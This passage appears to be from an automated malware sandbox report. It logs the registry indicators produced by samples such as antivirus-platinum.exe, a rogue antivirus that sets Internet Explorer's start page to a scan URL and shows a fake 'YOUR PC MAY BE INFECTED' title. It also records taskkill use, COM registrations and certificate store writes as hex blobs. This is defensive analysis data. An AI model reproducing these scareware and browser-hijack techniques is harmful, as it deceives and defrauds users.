description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 5128 taskkill.exe 1368 taskkill.exe 4812 taskkill.exe 4992 taskkill.exe 1752 taskkill.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Internet Explorer\ltHI = "0" [email protected] Set value (int) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Internet Explorer\ltTST = "32954" [email protected] Key created \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Microsoft\Internet Explorer\Main [email protected] Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main antivirus-platinum.exe Key created \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Use FormSuggest = "Yes" [email protected] Key created \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Microsoft\Internet Explorer\Main antivirus-platinum.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title = "YOUR PC MAY BE INFECTED WITH SPYWARE OR OTHER MALICIOUS ITEMS" antivirus-platinum.exe Set value (int) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Internet Explorer\IIL = "0" [email protected] -
Modifies Internet Explorer start page 1 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" antivirus-platinum.exe Set value (str) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" antivirus-platinum.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133892675105665519" msedge.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9ED94442-E5E8-101B-B9B5-444553540000} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{35053A21-8589-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8A8-850A-101B-AFC0-4210102A8DA7}\InprocServer32\ = "c:\\windows\\comctl32.ocx" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8D2-850A-101B-AFC0-4210102A8DA7}\MiscStatus\1 regsvr32.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5ACBB956-5C57-11CF-8993-00AA00688B10} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8A4-850A-101B-AFC0-4210102A8DA7}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{373FF7F1-EB8B-11CD-8820-08002B2F4F5A}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.TreeCtrl.2\CLSID\ = "{C74190B6-8589-11D1-B16A-00C0F0283628}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE32-8596-11D1-B16A-00C0F0283628} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0BFBE875-E12B-9900-B932-1A76EC415E53}\AutoConvertTo RegClean.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8A-9D6A-101B-AFC0-4210102A8DA7}\MiscStatus\ = "0" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B66834C6-2E60-11CE-8748-524153480004}\InprocServer32\ = "c:\\windows\\comctl32.ocx" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7}\VersionIndependentProgID regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6027C2D4-FB28-11CD-8820-08002B2F4F5A}\InprocServer32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D8C-9D6A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BF877892-E026-11CF-8E74-00A0C90F26F8}\ = "IListItem11" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{35053A22-8589-11D1-B16A-00C0F0283628}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4} regsvr32.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5ACBB955-5C57-11CF-8993-00AA00688B10} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E6E17E88-DF38-11CF-8E74-00A0C90F26F8}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8AF-850A-101B-AFC0-4210102A8DA7}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\ProgID regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1EFB6599-857C-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9ED94441-E5E8-101B-B9B5-444553540000} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DA8D91-9D6A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66833FE9-8583-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83604-895E-11D0-B0A6-000000000000}\ProxyStubClsid32 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{35053A22-8589-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0BFBE875-E12B-9900-B932-1A76EC415E53}\ProgID\ = "ExcelMacrosheet" RegClean.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E953-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DA8D91-9D6A-101B-AFC0-4210102A8DA7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\VersionIndependentProgID regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66833FE9-8583-11D1-B16A-00C0F0283628} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F08DF952-8592-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7}\ProgID\ = "COMCTL.ImageListCtrl.1" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9ED94442-E5E8-101B-B9B5-444553540000}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7791BA50-E020-11CF-8E74-00A0C90F26F8}\ = "ITabs" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8556BCD2-E01E-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8A-9D6A-101B-AFC0-4210102A8DA7}\MiscStatus regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D95-9D6A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.TreeCtrl\ = "Microsoft TreeView Control, version 5.0 (SP2)" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7}\VersionIndependentProgID\ = "COMCTL.ImageListCtrl" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{58DA8D8F-9D6A-101B-AFC0-4210102A8DA7}\MiscStatus\ = "0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDD1F04B-858B-11D1-B16A-00C0F0283628}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2C247F23-8591-11D1-B16A-00C0F0283628}\MiscStatus\1\ = "165265" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8E3867A3-8586-11D1-B16A-00C0F0283628}\InprocServer32\ = "c:\\windows\\mscomctl.ocx" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F08DF954-8592-11D1-B16A-00C0F0283628}\InprocServer32\ = "c:\\windows\\mscomctl.ocx" regsvr32.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE3E-8596-11D1-B16A-00C0F0283628} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8A0-850A-101B-AFC0-4210102A8DA7}\TypeLib\Version = "1.3" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{35053A22-8589-11D1-B16A-00C0F0283628}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C74190B4-8589-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C8A3DC00-8593-11D1-B16A-00C0F0283628}\TypeLib\Version = "2.0" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0713E8A5-850A-101B-AFC0-4210102A8DA7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8A1-850A-101B-AFC0-4210102A8DA7} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DA8D8B-9D6A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BF877894-E026-11CF-8E74-00A0C90F26F8}\TypeLib\ = "{6B7E6392-850A-101B-AFC0-4210102A8DA7}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E6E17E84-DF38-11CF-8E74-00A0C90F26F8}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8D0-850A-101B-AFC0-4210102A8DA7}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA662-8594-11D1-B16A-00C0F0283628}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\COMCTL.SBarCtrl\ = "Microsoft StatusBar Control, version 5.0 (SP2)" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6B7E638F-850A-101B-AFC0-4210102A8DA7}\Version\ = "1.3" regsvr32.exe -
Modifies system certificate store 2 TTPs 8 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8AD5C9987E6F190BD6F5416E2DE44CCD641D8CDA\Blob = 0300000001000000140000008ad5c9987e6f190bd6f5416e2de44ccd641d8cda140000000100000014000000daed6474149c143cabdd99a9bd5b284d8b3cc9d8040000000100000010000000ff5fbc4290fa389e798467ebd7ae940b0f0000000100000014000000c45627b5584bf62327df60d6185744a2d2f2bcbf190000000100000010000000e843ac3b52ec8c297fa948c9b1fb28195c00000001000000040000000008000018000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c4b0000000100000044000000350034003500370041003800430045003400420032004100370034003900390046003800320039003900410030003100330042003600450031004300370043005f000000200000000100000088040000308204843082036ca0030201020210421af2940984191f520a4bc62426a74b300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3035303630373038303931305a170d3230303533303130343833385a308195310b3009060355040613025553310b3009060355040813025554311730150603550407130e53616c74204c616b652043697479311e301c060355040a131554686520555345525452555354204e6574776f726b3121301f060355040b1318687474703a2f2f7777772e7573657274727573742e636f6d311d301b0603550403131455544e2d5553455246697273742d4f626a65637430820122300d06092a864886f70d01010105000382010f003082010a0282010100ceaa813fa3a36178aa31005595119e270f1f1cdf3a9b826830c04a611df12f0efabe79f7a523ef55519684cddbe3b96e3e31d80a2067c7f4d9bf94eb47043e02ce2aa25d870409f6309d188a97b2aa1cfc41d2a136cbfb3d91bae7d97035fae4e790c39ba39bd33cf5129977b1b709e068e61cb8f39463886a6afe0b76c9bef422e467b9ab1a5e77c18507dd0d6cbfee06c7776a419ea70fd7fbee9417b7fc85bea4abc41c31ddd7b6d1e4f0efdf168fb25293d7a1d489a1072ebfe10112421e1ae1d89534db647928ffba2e11c2e5e85b9248fb470bc26cdaad328341f3a5e54170fd65906dfafa51c4f9bd962b19042cd36da7dcf07f6f8365e26aab8786750203010001a381f43081f1301f0603551d23041830168014adbd987a34b426f7fac42654ef03bde024cb541a301d0603551d0e04160414daed6474149c143cabdd99a9bd5b284d8b3cc9d8300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030440603551d1f043d303b3039a037a0358633687474703a2f2f63726c2e7573657274727573742e636f6d2f416464547275737445787465726e616c4341526f6f742e63726c303506082b0601050507010104293027302506082b060105050730018619687474703a2f2f6f6373702e7573657274727573742e636f6d300d06092a864886f70d010105050003820101004d422fa6c18aeb07809058468cf81939662a3c5a2c6dcfd4d987558d790b12887b408fd5c7f84b8d551663adb757dc3b2bbdd3c14f1e03874b449be3e2404526f326492b6a84f1547ad442dafcd36abb667eca9eeae9bbdc07c7c3924e833c81499f92d53209ea492ea111719a36d2c54e68b6cb0e1b2516af6cde5d76d81f72b193268617db18deaf45e9dffb98af1418eda45ef6899445f055044addff27dd064a40f6b4bcf1e40f9902bbfd5d0e2e28c1be3b5f1a3f971084bc163ed8a39c631d66cb5c5fda3ef30f0a093522dbdbc03f00f9e60d5d67d1fda01e032bd940f7becc87665480a6a3b8f51962d5d226b19826ee9acb44a7455a8195151af551 6AdwCleaner.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 6AdwCleaner.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d557e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d90103000000010000001400000002faf3e291435468607857694df5e45b6885186820000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 6AdwCleaner.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b6885186868000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 6AdwCleaner.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 walliant.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a walliant.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040